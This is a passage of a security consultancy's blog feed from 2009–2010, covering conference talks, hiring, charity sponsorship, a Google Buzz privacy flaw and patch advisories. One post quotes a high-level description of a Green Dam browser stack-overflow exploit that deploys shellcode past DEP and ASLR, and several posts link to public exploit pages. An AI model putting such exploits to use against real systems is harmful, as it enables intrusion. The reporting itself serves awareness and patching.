could do talks remotely(and completely legally in terms of UAE specs). Very clever I must say! &lt;br /&gt;&lt;br /&gt;Andries was great in his contribution to the Wireless and Bluetooth Hacking 101 training session and we received great feedback from our attendees about the course. In terms of the other talks at the actual conference, they were definitely of international standard and a great refresher at many of the critical issues which still seem to be very prominent in our industry. &lt;br /&gt;&lt;br /&gt;Andries and I both agreed that Mr Shah’s talk on Web Application Hacking was the most interesting, as it is a space which we are very active in. Mauriano’s SAP vulnerabilities talk and his discussion around SAP’s testing framework (bizsploit) was also very informative. In terms of our talk, it was extremely well received by the audience and we have had very positive feedback. You can download our slides from &lt;a href="http://www.telspace.co.za/D1%20-%20Dino%20Covotsos%20-%20Analysis%20of%20a%20Next%20Generation%20Botnet.pdf"&gt;here&lt;/a&gt; or from the hitb website directly.&lt;br /&gt;&lt;br /&gt;We met up with a lot of old friends and the networking opportunities were great(watch this space in the future) – we look forward to seeing many of our peers at HITB Amsterdam(Hopefully) later this year.&lt;br /&gt;&lt;br /&gt;Back on home-ground, last week (28th April 2010) we presented at the Information Security Group of Africa (ISGA) HITB feedback session. It was great to share some of our Dubai experiences with the local guys. You can download our feedback presentation at &lt;a href="http://www.telspace.co.za/isgfeedback.pdf"&gt;http://www.telspace.co.za/isgfeedback.pdf&lt;/a&gt; .&lt;br /&gt;&lt;br /&gt;Coming up, we have the Security Summit to look forward to next week. Telspace Systems has a corporate sponsorship at the event, and we’ll be there to chat, mingle and network. Mr Shah will be there too, so you must all go and check his talk out. What he says is very relevant locally and internationally.&lt;br /&gt;&lt;br /&gt;Have a great week everyone. Keep checking out our blog, more exciting news coming soon....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6364747836094916173?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6364747836094916173/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6364747836094916173' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6364747836094916173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6364747836094916173'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/05/hitb-and-more.html' title='HITB and more...'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_4Wfys5NtIhA/S-FZhHSOQRI/AAAAAAAAACQ/TIBZzti9t94/s72-c/resized_dsc02874.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6543458356019942038</id><published>2010-03-29T23:39:00.002+02:00</published><updated>2010-03-29T23:57:18.223+02:00</updated><title type='text'>Telspace sponsors beauty and the beasts</title><content type='html'>Bet you’re thinking... wtf? Well, good, coz we need your full attention. Telspace is doing something a little different in terms of ‘giving back’ this year, and you can help us, so listen up...&lt;br /&gt;&lt;br /&gt;Animals have always been close to my heart and I’ve been looking for a while now for worthwhile project where I can feel we are truly making a difference in some of their lives.&lt;br /&gt;&lt;br /&gt;Nadia van der Merwe, one of FHM’s shortlisted 100 Sexiest Women, is running a campaign for animal charity and came to us as a sponsor. Well, how we could refuse?&lt;br /&gt;&lt;br /&gt;She’s calling it Nadia VDM’s Proudly South African 100 Sexiest Campaign. The way it works is the more votes she gets, the more money that will be donated to charity – Lory Park Zoo, in this case. &lt;br /&gt;&lt;br /&gt;Last year, Nadia was voted 16 out of the 100 sexiest women in the world. This year, for every position she climbs in that ranking, Telspace System will donate R1000 to the zoo.&lt;br /&gt;&lt;br /&gt;So how did this campaign come about? According to Nadia she wanted something more ‘proudly South African’ to represent her FHM photoshoot this year, especially with all the current focus on the World Cup. After targeting the Big 5 as her theme, Nadia did her ‘shoot incorporating the animals.&lt;br /&gt;&lt;br /&gt;So guys, please – go to the FHM website(www.fhm.co.za) and vote for Nadia van der Merwe. If helping out animals is not your thing, its worth it just to go see some of her incredible photos online.&lt;br /&gt;&lt;br /&gt;P.S.&lt;br /&gt;&lt;br /&gt;Telspace Systems has sponsored a party for Nadia van der Merwe at Latinova in Rosebank, JHB this coming Saturday evening. This includes a fashion show with Nadia - Sporting our leet Telspace Systems gear. Be there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6543458356019942038?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6543458356019942038/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6543458356019942038' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6543458356019942038'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6543458356019942038'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/03/telspace-sponsors-beauty-and-beasts.html' title='Telspace sponsors beauty and the beasts'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-4243036581128172426</id><published>2010-03-18T12:38:00.002+02:00</published><updated>2010-03-18T12:41:16.197+02:00</updated><title type='text'>See you at HITBSecConf2010!</title><content type='html'>We’re excited to not only be presenting, but training at this year’s Hack in the Box conference, which takes place in Dubai from 19-22 April. Our talk will be focused on next generation botnets, and what kind of power they give to botmasters. Furthermore, we’ll be demonstrating how DNS is used to evade CNC control take down, and explore the recent iPhone botnet and the malicious worms that followed its discovery. &lt;br /&gt;&lt;br /&gt;We will also be doing our popular Wireless &amp; Bluetooth Hacking 101 course, which most of you have probably already heard of. It will be Telspace security analyst Andries Burger’s virgin trip to Hack in the Box – and his first time helping us with the training. We are all pretty eager to see how he takes it all...&lt;br /&gt;&lt;br /&gt;If you can’t make it out to Dubai this year, don’t be too bleak – we’re going to be doing some cool things right here in sunny SA in April as well.&lt;br /&gt;&lt;br /&gt;First off, we’ll be presenting our feedback talk at the Information Security Group of Africa’s HITB feedback session at the end of April.&lt;br /&gt;&lt;br /&gt;And for those of you who have not yet been to one of our Wireless &amp; Bluetooth Hacking 101 courses, you’ll have a chance to on 11-12 April when we will be offering training in Sandton. &lt;br /&gt;&lt;br /&gt;Thank you all again for your continued support – it is your interest that allows us to participate in high-profile events such as Hack in the Box in the first place. Hope to see you all there!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-4243036581128172426?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/4243036581128172426/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=4243036581128172426' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4243036581128172426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4243036581128172426'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/03/see-you-at-hitbsecconf2010.html' title='See you at HITBSecConf2010!'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-7863395566669074241</id><published>2010-02-18T01:30:00.003+02:00</published><updated>2010-02-18T01:41:37.331+02:00</updated><title type='text'>Telspace is hiring (again...)</title><content type='html'>The past few months have been rather chaotic at Telspace Systems. Therefore, its time (once again) for us to look at hiring a few more security analysts for our unique Telspace team.&lt;br /&gt;&lt;br /&gt;We're looking for extremely skilled security analysts (especially on the web application hacking side) who are passionate about information security, enjoy intense challenges, can work in an informal environment and have quite flexible time in their daily lifestyles. A major plus would be having some sort of Foosball skills. &lt;br /&gt;&lt;br /&gt;If you think you have what it takes or that you might know of someone who makes the cut, please forward details on to us as soon as possible so that we can meet up and chat.&lt;br /&gt;&lt;br /&gt;Take care,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-7863395566669074241?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/7863395566669074241/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=7863395566669074241' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7863395566669074241'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7863395566669074241'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/02/telspace-is-hiring-again.html' title='Telspace is hiring (again...)'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-7389693855887374343</id><published>2010-02-12T16:58:00.002+02:00</published><updated>2010-02-15T10:44:16.583+02:00</updated><title type='text'>Google buzz privacy flaw.</title><content type='html'>By now you have probably heard about Google Buzz. A new social networking service brought out by Google, allowing users to share updates, photos and by the looks of it your entire contact list and anyone you have emailed. It also encompasses factors from the well known Twitter and Facebook. With all new services, security factors are an issue and Google buzz is no different. A rather serious privacy flaw lies in it, exposing all your contact addresses and people you have emailed.&lt;br /&gt;&lt;br /&gt;Once in google buzz you have a prompt with the following "You're already set up to follow the people you email and chat with." So by simply emailing someone you will now be "following" them and they will have access to you contact list.&lt;br /&gt;&lt;br /&gt;One of the main issues being discussed about Google buzz is the automatic opt-in, in a sense forcing users into using the service. Then publicly disclosing your email and contact list, leaving your email open to spammers. All and all a bad move from Google. They seem to be taking a quick and serious response to the issues, with a couple fixes being brought out already.&lt;br /&gt;&lt;br /&gt;However in the mean time google is asking for feedback, and you can give yours here: http://mail.google.com/support/bin/request.py?contact_type=buzz&lt;br /&gt;&lt;br /&gt;In other news our submission wasn't accepted for the local security summit, yet the talk has been internationally accepted. We can understand and wouldn't want to side track the vendor talks and actually get some technical talks in there anyway. ;)&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;UPDATE: Well, Google has listened to everyones feedback and already fixed a number of the issues. For more info please read &lt;a href="http://gmailblog.blogspot.com/2010/02/new-buzz-start-up-experience-based-on.html"&gt;here.&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-7389693855887374343?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/7389693855887374343/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=7389693855887374343' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7389693855887374343'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7389693855887374343'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/02/google-buzz-privacy-flaw_12.html' title='Google buzz privacy flaw.'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6790168772866934439</id><published>2010-02-02T18:19:00.003+02:00</published><updated>2010-02-02T18:32:58.483+02:00</updated><title type='text'>Another post... finally.</title><content type='html'>Hi all, First off apologies for the rather dormant blog lately. Things have again gotten pretty chaotic on our side. The good kind of chaos though. We however are going to keep more posts coming your way.&lt;br /&gt;&lt;br /&gt;For the year ahead we have already got a couple trips to Dubai and possibly Amsterdam planned. Although Dino might make me sign a few more NDAs before we head there. We also have a number of projects lined up which we will do our best to keep everyone up to date on. We wish you all the best for the year ahead.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6790168772866934439?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6790168772866934439/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6790168772866934439' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6790168772866934439'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6790168772866934439'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/02/another-post-finally.html' title='Another post... finally.'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-8131934588548382622</id><published>2009-09-09T21:07:00.003+02:00</published><updated>2009-09-09T21:13:37.739+02:00</updated><title type='text'>A new addition to our team</title><content type='html'>Telspace Systems would like to congratulate and welcome Andries Burger. Andries beat some stiff competition and he has come on board the infosec team as a Junior Security Analyst. We wish you a warm welcome!&lt;br /&gt;&lt;br /&gt;For our clients this new addition to our dedicated team brings some new knowledge and better service delivery to our clients.&lt;br /&gt;&lt;br /&gt;Telspace Systems is always looking out for new talent and we are currently in the process of hiring even more analysts, if you think you make the cut please contact us.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-8131934588548382622?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/8131934588548382622/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=8131934588548382622' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8131934588548382622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/8131934588548382622'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/09/new-addition-to-our-team.html' title='A new addition to our team'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6376947740335496298</id><published>2009-09-09T15:32:00.003+02:00</published><updated>2009-09-09T15:48:50.084+02:00</updated><title type='text'>1995 all over again.</title><content type='html'>Last night an exploit was released affecting all Windows7 and  Vista(Fully patched) servers. We have also confirmed in our lab that  this exploit also works against windows server 2008.&lt;br /&gt;&lt;br /&gt;The exploit allows for remote denial of service attacks against any of  these server.&lt;br /&gt;&lt;br /&gt;The bug lies in the SMB2.0. ( &lt;a class="moz-txt-link-freetext" href="http://securityreason.com/exploitalert/7138"&gt;http://securityreason.com/exploitalert/7138&lt;/a&gt; )&lt;br /&gt;&lt;br /&gt;Microsoft has recommended that that the SMB port(445) be blocked until Microsoft releases a patch.&lt;br /&gt;&lt;br /&gt;More can be read here: http://www.microsoft.com/technet/security/advisory/975497.mspx&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6376947740335496298?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6376947740335496298/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6376947740335496298' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6376947740335496298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6376947740335496298'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/09/1995-all-over-again.html' title='1995 all over again.'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5040692213773244763</id><published>2009-07-24T17:31:00.002+02:00</published><updated>2009-07-24T17:38:42.448+02:00</updated><title type='text'>Telspace to present at Itex - Botswana</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_AmtTfX9y828/SmnVR44QtuI/AAAAAAAAAAU/JC93pxdbpFw/s1600-h/itex.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 108px;" src="http://3.bp.blogspot.com/_AmtTfX9y828/SmnVR44QtuI/AAAAAAAAAAU/JC93pxdbpFw/s320/itex.png" alt="" id="BLOGGER_PHOTO_ID_5362051334664140514" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Telspace CEO Dino Covotsos and Senior Security Analyst Charlton Smith will be keynote speakers at this premier IT conference in Botswana which takes place between the 30th of July and 1st of August 2009.&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;b&gt;About Itex&lt;/b&gt;&lt;/p&gt;           &lt;span&gt;&lt;span id="bodytext"&gt;The new-world economy is based on globally networked information systems. Information today is the currency for a knowledge economy geared towards development.&lt;br /&gt;               &lt;br /&gt;The Information Technology Exhibition (ITEX) is prudently crafted for exhibitors to showcase the latest technologies in the areas of Business Solutions, Telecommunication, Communication and Consumer Electronics. It also avails an opportunity for descision makers to learn about current technologies.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5040692213773244763?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5040692213773244763/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5040692213773244763' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5040692213773244763'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5040692213773244763'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/07/telspace-to-present-at-itex-botswana.html' title='Telspace to present at Itex - Botswana'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_AmtTfX9y828/SmnVR44QtuI/AAAAAAAAAAU/JC93pxdbpFw/s72-c/itex.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6199447320410691715</id><published>2009-06-15T13:32:00.001+02:00</published><updated>2009-06-15T13:34:46.873+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='china'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Green Dam hackers.</title><content type='html'>The Chinese government has mandated that all computers in the country must have the screening software installed.&lt;br /&gt;&lt;br /&gt;This obviously bring about many security issues, such as - if the applications installed are not secure? This could leave the whole of China exposed to being compromised.&lt;br /&gt;&lt;br /&gt;Security doesn't seem to phase the government too much. We have already seen &lt;a href="http://www.milw0rm.com/exploits/8938"&gt;an exploit &lt;/a&gt;released for one of the applications to be installed(released 2009-06-12) Green Dam.&lt;br /&gt;&lt;br /&gt;The Green Dam software filters content by blocking URLs and Web site images and by monitoring text in other applications.&lt;br /&gt;&lt;br /&gt;From Exploit:&lt;br /&gt;&lt;br /&gt;"Green Dam is a software used for monitoring and anti-pornography, popularizing by Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs. Now it already has 50 million copies in China.&lt;br /&gt;&lt;br /&gt;In order to monitor the URL that user is exploring, Green Dam injected the browser process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the browser process.&lt;br /&gt;&lt;br /&gt;This exploit can be used for exploitation on IE, on those computers installed Green Dam. I used the .net binary to deploy shellcode, for it`s more stable than Heap Spray, and able to bypass DEP and ASLR on Vista."&lt;br /&gt;&lt;br /&gt;*sigh*&lt;br /&gt;&lt;br /&gt;In other News Dino and I will be going through to Botswana next month, to keynote at a conference. We will provide you with more information soon.&lt;br /&gt;&lt;br /&gt;Take care.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6199447320410691715?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6199447320410691715/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6199447320410691715' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6199447320410691715'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6199447320410691715'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/06/green-dam-hackers.html' title='Green Dam hackers.'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-1834423334060445930</id><published>2009-05-18T15:35:00.002+02:00</published><updated>2009-05-18T15:39:36.869+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='summit'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>About time!</title><content type='html'>First off, apologies for not updating the blog in a while. Things have been rather hectic here :)&lt;br /&gt;&lt;br /&gt;Dino Covotsos and Daniella Kafouris recently presented at Crawford college. They presented on various social networking issues. The talk was aimed at making parents more aware as to what threats their children are faced with when using social networks. From Mxit to Facebook. The presentation was well received by Crawford college. Telspace Systems will also be presenting on Clickjacking at the Security Summit 2009 on day 2, so if you are going to the summit try catch our talk.&lt;br /&gt;&lt;br /&gt;On the security side, quite a few exploits have been released this month, the more dangerous ones being '&lt;a href="http://www.vupen.com/english/advisories/2009/1236"&gt;Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit&lt;/a&gt;' and '&lt;a href="http://securityreason.com/exploitalert/6230"&gt;Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability&lt;/a&gt;' so please apply the relevant patches and updates as soon as possible.&lt;br /&gt;&lt;br /&gt;Till the next post be safe and take care.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-1834423334060445930?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/1834423334060445930/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=1834423334060445930' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1834423334060445930'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1834423334060445930'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/05/about-time.html' title='About time!'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-3953553758764133173</id><published>2009-02-13T11:18:00.000+02:00</published><updated>2009-02-13T11:20:03.736+02:00</updated><title type='text'>Twitters falls victim to ClickJack attack</title><content type='html'>Twitter put an end to a clickjacking attack yesterday that got users to click on a link labelled “Don’t Click”.&lt;br /&gt;&lt;br /&gt;In an attempt to satisfy their curiosity (or simply do what they were told not to do) thousands of users clicked on the link.&lt;br /&gt;&lt;br /&gt;Whether they clicked on the link or not, a link would appear on their Twitter page with the same link and message as they originally received. &lt;br /&gt;&lt;br /&gt;"We patched the "don't click" clickjacking attack 10 minutes ago. Problem should be gone," John Adams, aka Netik, an operations engineer at Twitter, tweeted around 11 am PST.&lt;br /&gt;&lt;br /&gt;Although annoying, the clickjacking seems to be harmless and just propagated itself. &lt;br /&gt;&lt;br /&gt;More on this attack can be found &lt;a href="http://sunlightlabs.com/blog/2009/02/12/what-dont-click-business/"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-3953553758764133173?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/3953553758764133173/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=3953553758764133173' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3953553758764133173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3953553758764133173'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2009/02/twitters-falls-victim-to-clickjack.html' title='Twitters falls victim to ClickJack attack'/><author><name>Ilva</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-1259920139444328248</id><published>2009-02-06T09:57:00.002+02:00</published><updated>2009-02-06T10:00:30.749+02:00</updated><title type='text'>ISG meeting - 5 Feb 2009</title><content type='html'>&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal  {mso-style-parent:"";  margin:0cm;  margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:12.0pt;  font-family:"Times New Roman";  mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink  {color:blue;  text-decoration:underline;  text-underline:single;} a:visited, span.MsoHyperlinkFollowed  {color:purple;  text-decoration:underline;  text-underline:single;} @page Section1  {size:612.0pt 792.0pt;  margin:72.0pt 90.0pt 72.0pt 90.0pt;  mso-header-margin:36.0pt;  mso-footer-margin:36.0pt;  mso-paper-source:0;} div.Section1  {page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable  {mso-style-name:"Table Normal";  mso-tstyle-rowband-size:0;  mso-tstyle-colband-size:0;  mso-style-noshow:yes;  mso-style-parent:"";  mso-padding-alt:0cm 5.4pt 0cm 5.4pt;  mso-para-margin:0cm;  mso-para-margin-bottom:.0001pt;  